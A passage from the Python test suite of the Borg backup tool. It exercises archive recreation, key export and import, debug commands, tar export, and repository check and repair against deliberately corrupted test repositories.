*traceback.format_list(extracted_tb),
*traceback.format_exception(exception.__class__, exception, None),
sep='', end='', file=sys.stderr, flush=True)
assert assert_data['num_calls'] == 1, "Lock.migrate_lock() must be called exactly once."
assert exception is None, "Lock.migrate_lock() may not raise an exception."
assert_data_before = assert_data['before']
assert assert_data_before['old_id_alive'], "old_id must be alive (=must not be stale) when calling Lock.migrate_lock()."
assert assert_data_before['new_id_alive'], "new_id must be alive (=must not be stale) when calling Lock.migrate_lock()."
assert_data_after = assert_data['after']
assert assert_data_after['old_id_alive'], "old_id must be alive (=must not be stale) when Lock.migrate_lock() has returned."
assert assert_data_after['new_id_alive'], "new_id must be alive (=must not be stale) when Lock.migrate_lock() has returned."
finally:
# Undecorate
borg.locking.Lock.migrate_lock = borg.locking.Lock.migrate_lock.__wrapped__
def verify_aes_counter_uniqueness(self, method):
seen = set() # Chunks already seen
used = set() # counter values already used
def verify_uniqueness():
with Repository(self.repository_path) as repository:
for id, _ in repository.open_index(repository.get_transaction_id()).iteritems():
data = repository.get(id)
hash = sha256(data).digest()
if hash not in seen:
seen.add(hash)
num_blocks = num_cipher_blocks(len(data) - 41)
nonce = bytes_to_long(data[33:41])
for counter in range(nonce, nonce + num_blocks):
self.assert_not_in(counter, used)
used.add(counter)
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=' + method, self.repository_location)
verify_uniqueness()
self.cmd('create', self.repository_location + '::test', 'input')
verify_uniqueness()
self.cmd('create', self.repository_location + '::test.2', 'input')
verify_uniqueness()
self.cmd('delete', self.repository_location + '::test.2')
verify_uniqueness()
def test_aes_counter_uniqueness_keyfile(self):
self.verify_aes_counter_uniqueness('keyfile')
def test_aes_counter_uniqueness_passphrase(self):
self.verify_aes_counter_uniqueness('repokey')
def test_debug_dump_archive_items(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('debug', 'dump-archive-items', self.repository_location + '::test')
output_dir = sorted(os.listdir('output'))
assert len(output_dir) > 0 and output_dir[0].startswith('000000_')
assert 'Done.' in output
def test_debug_dump_repo_objs(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('debug', 'dump-repo-objs', self.repository_location)
output_dir = sorted(os.listdir('output'))
assert len(output_dir) > 0 and output_dir[0].startswith('00000000_')
assert 'Done.' in output
def test_debug_put_get_delete_obj(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
data = b'some data'
hexkey = sha256(data).hexdigest()
self.create_regular_file('file', contents=data)
output = self.cmd('debug', 'put-obj', self.repository_location, 'input/file')
assert hexkey in output
output = self.cmd('debug', 'get-obj', self.repository_location, hexkey, 'output/file')
assert hexkey in output
with open('output/file', 'rb') as f:
data_read = f.read()
assert data == data_read
output = self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
assert "deleted" in output
output = self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
assert "not found" in output
output = self.cmd('debug', 'delete-obj', self.repository_location, 'invalid')
assert "is invalid" in output
def test_init_interrupt(self):
def raise_eof(*args):
raise EOFError
with patch.object(KeyfileKeyBase, 'create', raise_eof):
self.cmd('init', '--encryption=repokey', self.repository_location, exit_code=1)
assert not os.path.exists(self.repository_location)
def test_init_requires_encryption_option(self):
self.cmd('init', self.repository_location, exit_code=2)
def test_init_nested_repositories(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
if self.FORK_DEFAULT:
self.cmd('init', '--encryption=repokey', self.repository_location + '/nested', exit_code=2)
else:
with pytest.raises(Repository.AlreadyExists):
self.cmd('init', '--encryption=repokey', self.repository_location + '/nested')
def check_cache(self):
# First run a regular borg check
self.cmd('check', self.repository_location)
# Then check that the cache on disk matches exactly what's in the repo.
with self.open_repository() as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest, sync=False) as cache:
original_chunks = cache.chunks
Cache.destroy(repository)
with Cache(repository, key, manifest) as cache:
correct_chunks = cache.chunks
assert original_chunks is not correct_chunks
seen = set()
for id, (refcount, size, csize) in correct_chunks.iteritems():
o_refcount, o_size, o_csize = original_chunks[id]
assert refcount == o_refcount
assert size == o_size
assert csize == o_csize
seen.add(id)
for id, (refcount, size, csize) in original_chunks.iteritems():
assert id in seen
def test_check_cache(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with self.open_repository() as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest, sync=False) as cache:
cache.begin_txn()
cache.chunks.incref(list(cache.chunks.iteritems())[0][0])
cache.commit()
with pytest.raises(AssertionError):
self.check_cache()
def test_recreate_target_rc(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('recreate', self.repository_location, '--target=asdf', exit_code=2)
assert 'Need to specify single archive' in output
def test_recreate_target(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.check_cache()
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.check_cache()
original_archive = self.cmd('list', self.repository_location)
self.cmd('recreate', archive, 'input/dir2', '-e', 'input/dir2/file3', '--target=new-archive')
self.check_cache()
archives = self.cmd('list', self.repository_location)
assert original_archive in archives
assert 'new-archive' in archives
archive = self.repository_location + '::new-archive'
listing = self.cmd('list', '--short', archive)
assert 'file1' not in listing
assert 'dir2/file2' in listing
assert 'dir2/file3' not in listing
def test_recreate_basic(self):
self.create_test_files()
self.create_regular_file('dir2/file3', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.cmd('recreate', archive, 'input/dir2', '-e', 'input/dir2/file3')
self.check_cache()
listing = self.cmd('list', '--short', archive)
assert 'file1' not in listing
assert 'dir2/file2' in listing
assert 'dir2/file3' not in listing
@pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_recreate_subtree_hardlinks(self):
# This is essentially the same problem set as in test_extract_hardlinks
self._extract_hardlinks_setup()
self.cmd('create', self.repository_location + '::test2', 'input')
self.cmd('recreate', self.repository_location + '::test', 'input/dir1')
self.check_cache()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
with changedir('output'):
self.cmd('extract', self.repository_location + '::test2')
assert os.stat('input/dir1/hardlink').st_nlink == 4
def test_recreate_rechunkify(self):
with open(os.path.join(self.input_path, 'large_file'), 'wb') as fd:
fd.write(b'a' * 280)
fd.write(b'b' * 280)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--chunker-params', '7,9,8,128', self.repository_location + '::test1', 'input')
self.cmd('create', self.repository_location + '::test2', 'input', '--files-cache=disabled')
list = self.cmd('list', self.repository_location + '::test1', 'input/large_file',
'--format', '{num_chunks} {unique_chunks}')
num_chunks, unique_chunks = map(int, list.split(' '))
# test1 and test2 do not deduplicate
assert num_chunks == unique_chunks
self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
self.check_cache()
# test1 and test2 do deduplicate after recreate
assert int(self.cmd('list', self.repository_location + '::test1', 'input/large_file', '--format={size}'))
assert not int(self.cmd('list', self.repository_location + '::test1', 'input/large_file',
'--format', '{unique_chunks}'))
def test_recreate_recompress(self):
self.create_regular_file('compressible', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', '-C', 'none')
file_list = self.cmd('list', self.repository_location + '::test', 'input/compressible',
'--format', '{size} {csize} {sha256}')
size, csize, sha256_before = file_list.split(' ')
assert int(csize) >= int(size) # >= due to metadata overhead
self.cmd('recreate', self.repository_location, '-C', 'lz4', '--recompress')
self.check_cache()
file_list = self.cmd('list', self.repository_location + '::test', 'input/compressible',
'--format', '{size} {csize} {sha256}')
size, csize, sha256_after = file_list.split(' ')
assert int(csize) < int(size)
assert sha256_before == sha256_after
def test_recreate_timestamp(self):
local_timezone = datetime.now(timezone(timedelta(0))).astimezone().tzinfo
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.cmd('recreate', '--timestamp', "1970-01-02T00:00:00", '--comment',
'test', archive)
info = self.cmd('info', archive).splitlines()
dtime = datetime(1970, 1, 2) + local_timezone.utcoffset(None)
s_time = dtime.strftime("%Y-%m-%d")
assert any([re.search(r'Time \(start\).+ %s' % s_time, item) for item in info])
assert any([re.search(r'Time \(end\).+ %s' % s_time, item) for item in info])
def test_recreate_dry_run(self):
self.create_regular_file('compressible', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
archives_before = self.cmd('list', self.repository_location + '::test')
self.cmd('recreate', self.repository_location, '-n', '-e', 'input/compressible')
self.check_cache()
archives_after = self.cmd('list', self.repository_location + '::test')
assert archives_after == archives_before
def test_recreate_skips_nothing_to_do(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_before = self.cmd('info', self.repository_location + '::test')
self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
self.check_cache()
info_after = self.cmd('info', self.repository_location + '::test')
assert info_before == info_after # includes archive ID
def test_with_lock(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
lock_path = os.path.join(self.repository_path, 'lock.exclusive')
cmd = 'python3', '-c', 'import os, sys; sys.exit(42 if os.path.exists("%s") else 23)' % lock_path
self.cmd('with-lock', self.repository_location, *cmd, fork=True, exit_code=42)
def test_recreate_list_output(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=0)
self.create_regular_file('file2', size=0)
self.create_regular_file('file3', size=0)
self.create_regular_file('file4', size=0)
self.create_regular_file('file5', size=0)
self.cmd('create', self.repository_location + '::test', 'input')
output = self.cmd('recreate', '--list', '--info', self.repository_location + '::test', '-e', 'input/file2')
self.check_cache()
self.assert_in("input/file1", output)
self.assert_in("x input/file2", output)
output = self.cmd('recreate', '--list', self.repository_location + '::test', '-e', 'input/file3')
self.check_cache()
self.assert_in("input/file1", output)
self.assert_in("x input/file3", output)
output = self.cmd('recreate', self.repository_location + '::test', '-e', 'input/file4')
self.check_cache()
self.assert_not_in("input/file1", output)
self.assert_not_in("x input/file4", output)
output = self.cmd('recreate', '--info', self.repository_location + '::test', '-e', 'input/file5')
self.check_cache()
self.assert_not_in("input/file1", output)
self.assert_not_in("x input/file5", output)
def test_bad_filters(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('delete', '--first', '1', '--last', '1', self.repository_location, fork=True, exit_code=2)
def test_key_export_keyfile(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'r') as fd:
key_contents = fd.read()
assert key_contents == export_contents
os.unlink(key_file)
self.cmd('key', 'import', self.repository_location, export_file)
with open(key_file, 'r') as fd:
key_contents2 = fd.read()
assert key_contents2 == key_contents
def test_key_import_keyfile_with_borg_key_file(self):
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
exported_key_file = os.path.join(self.output_path, 'exported')
self.cmd('key', 'export', self.repository_location, exported_key_file)
key_file = os.path.join(self.keys_path, os.listdir(self.keys_path)[0])
with open(key_file, 'r') as fd:
key_contents = fd.read()
os.unlink(key_file)
imported_key_file = os.path.join(self.output_path, 'imported')
with environment_variable(BORG_KEY_FILE=imported_key_file):
self.cmd('key', 'import', self.repository_location, exported_key_file)
assert not os.path.isfile(key_file), '"borg key import" should respect BORG_KEY_FILE'
with open(imported_key_file, 'r') as fd:
imported_key_contents = fd.read()
assert imported_key_contents == key_contents
def test_key_export_repokey(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'repokey')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
with Repository(self.repository_path) as repository:
repo_key = RepoKey(repository)
repo_key.load(None, Passphrase.env_passphrase())
backup_key = KeyfileKey(key.TestKey.MockRepository())
backup_key.load(export_file, Passphrase.env_passphrase())
assert repo_key.enc_key == backup_key.enc_key
with Repository(self.repository_path) as repository:
repository.save_key(b'')
self.cmd('key', 'import', self.repository_location, export_file)
with Repository(self.repository_path) as repository:
repo_key2 = RepoKey(repository)
repo_key2.load(None, Passphrase.env_passphrase())
assert repo_key2.enc_key == repo_key2.enc_key
def test_key_export_qr(self):
export_file = self.output_path + '/exported.html'
self.cmd('init', self.repository_location, '--encryption', 'repokey')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', '--qr-html', self.repository_location, export_file)
with open(export_file, 'r', encoding='utf-8') as fd:
export_contents = fd.read()
assert bin_to_hex(repo_id) in export_contents
assert export_contents.startswith('<!doctype html>')
assert export_contents.endswith('</html>\n')
def test_key_export_directory(self):
export_directory = self.output_path + '/exported'
os.mkdir(export_directory)
self.cmd('init', self.repository_location, '--encryption', 'repokey')
self.cmd('key', 'export', self.repository_location, export_directory, exit_code=EXIT_ERROR)
def test_key_import_errors(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self.cmd('key', 'import', self.repository_location, export_file, exit_code=EXIT_ERROR)
with open(export_file, 'w') as fd:
fd.write('something not a key\n')
if self.FORK_DEFAULT:
self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
else:
with pytest.raises(NotABorgKeyFile):
self.cmd('key', 'import', self.repository_location, export_file)
with open(export_file, 'w') as fd:
fd.write('BORG_KEY a0a0a0\n')
if self.FORK_DEFAULT:
self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
else:
with pytest.raises(RepoIdMismatch):
self.cmd('key', 'import', self.repository_location, export_file)
def test_key_export_paperkey(self):
repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self._set_repository_id(self.repository_path, unhexlify(repo_id))
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'w') as fd:
fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
self.cmd('key', 'export', '--paper', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents == """To restore key use borg key import --paper /path/to/repo
BORG PAPER KEY v1
id: 2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02
1: 616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d
2: 737475 - 88
"""
def test_key_import_paperkey(self):
repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self._set_repository_id(self.repository_path, unhexlify(repo_id))
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'w') as fd:
fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
typed_input = (
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 02\n' # Forgot to type "-"
b'2 / e29442 3506da 4e1ea7 25f62a 5a3d41 - 02\n' # Forgot to type second "/"
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d42 - 02\n' # Typo (..42 not ..41)
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n' # Correct! Congratulations
b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
b'\n\n' # Abort [yN] => N
b'737475 88\n' # missing "-"
b'73747i - 88\n' # typo
b'73747 - 88\n' # missing nibble
b'73 74 75 - 89\n' # line checksum mismatch
b'00a1 - 88\n' # line hash collision - overall hash mismatch, have to start over
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n'
b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
b'73 74 75 - 88\n'
)
# In case that this has to change, here is a quick way to find a colliding line hash:
#
# from hashlib import sha256
# hash_fn = lambda x: sha256(b'\x00\x02' + x).hexdigest()[:2]
# for i in range(1000):
# if hash_fn(i.to_bytes(2, byteorder='big')) == '88': # 88 = line hash
# print(i.to_bytes(2, 'big'))
# break
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
# Test abort paths
typed_input = b'\ny\n'
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
typed_input = b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n\ny\n'
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
def test_debug_dump_manifest(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
dump_file = self.output_path + '/dump'
output = self.cmd('debug', 'dump-manifest', self.repository_location, dump_file)
assert output == ""
with open(dump_file, "r") as f:
result = json.load(f)
assert 'archives' in result
assert 'config' in result
assert 'item_keys' in result
assert 'timestamp' in result
assert 'version' in result
def test_debug_dump_archive(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
dump_file = self.output_path + '/dump'
output = self.cmd('debug', 'dump-archive', self.repository_location + "::test", dump_file)
assert output == ""
with open(dump_file, "r") as f:
result = json.load(f)
assert '_name' in result
assert '_manifest_entry' in result
assert '_meta' in result
assert '_items' in result
def test_debug_refcount_obj(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('debug', 'refcount-obj', self.repository_location, '0' * 64).strip()
assert output == 'object 0000000000000000000000000000000000000000000000000000000000000000 not found [info from chunks cache].'
create_json = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
archive_id = create_json['archive']['id']
output = self.cmd('debug', 'refcount-obj', self.repository_location, archive_id).strip()
assert output == 'object ' + archive_id + ' has 1 referrers [info from chunks cache].'
# Invalid IDs do not abort or return an error
output = self.cmd('debug', 'refcount-obj', self.repository_location, '124', 'xyza').strip()
assert output == 'object id 124 is invalid.\nobject id xyza is invalid.'
def test_debug_info(self):
output = self.cmd('debug', 'info')
assert 'CRC implementation' in output
assert 'Python' in output
def test_benchmark_crud(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
with environment_variable(_BORG_BENCHMARK_CRUD_TEST='YES'):
self.cmd('benchmark', 'crud', self.repository_location, self.input_path)
def test_config(self):
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('config', '--list', self.repository_location)
self.assert_in('[repository]', output)
self.assert_in('version', output)
self.assert_in('segments_per_dir', output)
self.assert_in('storage_quota', output)
self.assert_in('append_only', output)
self.assert_in('additional_free_space', output)
self.assert_in('id', output)
self.assert_not_in('last_segment_checked', output)
output = self.cmd('config', self.repository_location, 'last_segment_checked', exit_code=1)
self.assert_in('No option ', output)
self.cmd('config', self.repository_location, 'last_segment_checked', '123')
output = self.cmd('config', self.repository_location, 'last_segment_checked')
assert output == '123' + '\n'
output = self.cmd('config', '--list', self.repository_location)
self.assert_in('last_segment_checked', output)
self.cmd('config', '--delete', self.repository_location, 'last_segment_checked')
for cfg_key, cfg_value in [
('additional_free_space', '2G'),
('repository.append_only', '1'),
]:
output = self.cmd('config', self.repository_location, cfg_key)
assert output == '0' + '\n'
self.cmd('config', self.repository_location, cfg_key, cfg_value)
output = self.cmd('config', self.repository_location, cfg_key)
assert output == cfg_value + '\n'
self.cmd('config', '--delete', self.repository_location, cfg_key)
self.cmd('config', self.repository_location, cfg_key, exit_code=1)
self.cmd('config', '--list', '--delete', self.repository_location, exit_code=2)
self.cmd('config', self.repository_location, exit_code=2)
self.cmd('config', self.repository_location, 'invalid-option', exit_code=1)
requires_gnutar = pytest.mark.skipif(not have_gnutar(), reason='GNU tar must be installed for this test.')
requires_gzip = pytest.mark.skipif(not shutil.which('gzip'), reason='gzip must be installed for this test.')
@requires_gnutar
def test_export_tar(self):
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--progress')
with changedir('output'):
# This probably assumes GNU tar. Note -p switch to extract permissions regardless of umask.
subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/input', ignore_flags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
@requires_gzip
def test_export_tar_gz(self):
if not shutil.which('gzip'):
pytest.skip('gzip is not installed')
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar.gz', '--list')
assert 'input/file1\n' in list
assert 'input/dir2\n' in list
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../simple.tar.gz', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/input', ignore_flags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
def test_export_tar_strip_components(self):
if not shutil.which('gzip'):
pytest.skip('gzip is not installed')
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--strip-components=1', '--list')
# --list's path are those before processing with --strip-components
assert 'input/file1\n' in list
assert 'input/dir2\n' in list
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/', ignore_flags=True, ignore_xattrs=True, ignore_ns=True)
@requires_hardlinks
@requires_gnutar
def test_export_tar_strip_components_links(self):
self._extract_hardlinks_setup()
self.cmd('export-tar', self.repository_location + '::test', 'output.tar', '--strip-components=2')
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
@requires_hardlinks
@requires_gnutar
def test_extract_hardlinks_tar(self):
self._extract_hardlinks_setup()
self.cmd('export-tar', self.repository_location + '::test', 'output.tar', 'input/dir1')
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
def test_detect_attic_repo(self):
path = make_attic_repo(self.repository_path)
cmds = [
['create', path + '::test', self.tmpdir],
['extract', path + '::test'],
['check', path],
['rename', path + '::test', 'newname'],
['list', path],
['delete', path],
['prune', path],
['info', path + '::test'],
['key', 'export', path, 'exported'],
['key', 'import', path, 'import'],
['key', 'change-passphrase', path],
['break-lock', path],
]
for args in cmds:
output = self.cmd(*args, fork=True, exit_code=2)
assert 'Attic repository detected.' in output
@unittest.skipUnless('binary' in BORG_EXES, 'no borg.exe available')
class ArchiverTestCaseBinary(ArchiverTestCase):
EXE = 'borg.exe'
FORK_DEFAULT = True
@unittest.skip('does not raise Exception, but sets rc==2')
def test_init_parent_dirs(self):
pass
@unittest.skip('patches objects')
def test_init_interrupt(self):
pass
@unittest.skip('patches objects')
def test_extract_capabilities(self):
pass
@unittest.skip('patches objects')
def test_extract_xattrs_errors(self):
pass
@unittest.skip('test_basic_functionality seems incompatible with fakeroot and/or the binary.')
def test_basic_functionality(self):
pass
@unittest.skip('test_overwrite seems incompatible with fakeroot and/or the binary.')
def test_overwrite(self):
pass
def test_fuse(self):
if fakeroot_detected():
unittest.skip('test_fuse with the binary is not compatible with fakeroot')
else:
super().test_fuse()
class ArchiverCheckTestCase(ArchiverTestCaseBase):
def setUp(self):
super().setUp()
with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1')
self.create_src_archive('archive2')
def test_check_usage(self):
output = self.cmd('check', '-v', '--progress', self.repository_location, exit_code=0)
self.assert_in('Starting repository check', output)
self.assert_in('Starting archive consistency check', output)
self.assert_in('Checking segments', output)
# reset logging to new process default to avoid need for fork=True on next check
logging.getLogger('borg.output.progress').setLevel(logging.NOTSET)
output = self.cmd('check', '-v', '--repository-only', self.repository_location, exit_code=0)
self.assert_in('Starting repository check', output)
self.assert_not_in('Starting archive consistency check', output)
self.assert_not_in('Checking segments', output)
output = self.cmd('check', '-v', '--archives-only', self.repository_location, exit_code=0)
self.assert_not_in('Starting repository check', output)
self.assert_in('Starting archive consistency check', output)
output = self.cmd('check', '-v', '--archives-only', '--prefix=archive2', self.repository_location, exit_code=0)
self.assert_not_in('archive1', output)
output = self.cmd('check', '-v', '--archives-only', '--first=1', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_not_in('archive2', output)
output = self.cmd('check', '-v', '--archives-only', '--last=1', self.repository_location, exit_code=0)
self.assert_not_in('archive1', output)
self.assert_in('archive2', output)
def test_missing_file_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
valid_chunks = item.chunks
killed_chunk = valid_chunks[-1]
repository.delete(killed_chunk.id)
break
else:
self.fail('should not happen')
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.assert_in('New missing file chunk detected', output)
self.cmd('check', self.repository_location, exit_code=0)
output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
self.assert_in('broken#', output)
# check that the file in the old archives has now a different chunk list without the killed chunk
for archive_name in ('archive1', 'archive2'):
archive, repository = self.open_archive(archive_name)
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
self.assert_not_equal(valid_chunks, item.chunks)
self.assert_not_in(killed_chunk, item.chunks)
break
else:
self.fail('should not happen')
# do a fresh backup (that will include the killed chunk)
with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
self.create_src_archive('archive3')
# check should be able to heal the file now:
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('Healed previously missing file chunk', output)
self.assert_in('testsuite/archiver.py: Completely healed previously damaged file!', output)
# check that the file in the old archives has the correct chunks again
for archive_name in ('archive1', 'archive2'):
archive, repository = self.open_archive(archive_name)
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
self.assert_equal(valid_chunks, item.chunks)
break
else:
self.fail('should not happen')
# list is also all-healthy again
output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
self.assert_not_in('broken#', output)
def test_missing_archive_item_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(archive.metadata.items[0])
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
def test_missing_archive_metadata(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(archive.id)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
def test_missing_manifest(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(Manifest.MANIFEST_ID)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_corrupted_manifest(self):
archive, repository = self.open_archive('archive1')
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_manifest_rebuild_corrupted_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
chunk = repository.get(archive.id)
corrupted_chunk = chunk + b'corrupted!'
repository.put(archive.id, corrupted_chunk)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_manifest_rebuild_duplicate_archive(self):
archive, repository = self.open_archive('archive1')
